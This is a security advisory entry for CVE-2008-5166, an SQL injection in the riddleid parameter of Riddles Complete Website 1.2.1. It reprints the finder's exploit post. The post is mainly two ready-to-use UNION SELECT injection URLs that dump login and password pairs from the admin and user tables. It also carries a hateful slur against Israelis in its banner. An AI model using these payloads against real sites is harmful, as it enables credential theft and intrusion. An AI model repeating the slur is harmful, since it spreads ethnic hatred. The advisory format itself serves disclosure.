Topic : | Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability
|
SecurityAlert : 4615
CVE : CVE-2008-5166
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Cyb3r-1sT
Published : 21.11.2008
Affected Software : | easysitenetwork:riddles_website:1.2.1 |
 Advisory Content : | \ \____/ >> Kings of injection |
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at]
yahoo.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================
<<->> script : Riddles Website
<<->> Demo site : www.easysitenetwork.com/sites/riddles/
=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================
<<->> D0rk : N0-WaY
<<->> Exploit :
<!> for admin inf0 ::
>>>>
www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3
a,password),1,2,3,4,5,6+from+admin_login/*
<!> for members inf0 ::
>>>>
www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3
a,password),1,2,3,4,5,6+from+users/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $
nicehacker$anaconda-ksa $ sirus $ crazy-x
:: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y
<<->> InjEctOr5 TeaM
<<->> All muslims
References :
http://securityreason.com/expldownload/1/4209/1 (Exploit)
http://www.securityfocus.com/bid/29966
http://www.milw0rm.com/exploits/5946
http://secunia.com/advisories/30862
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|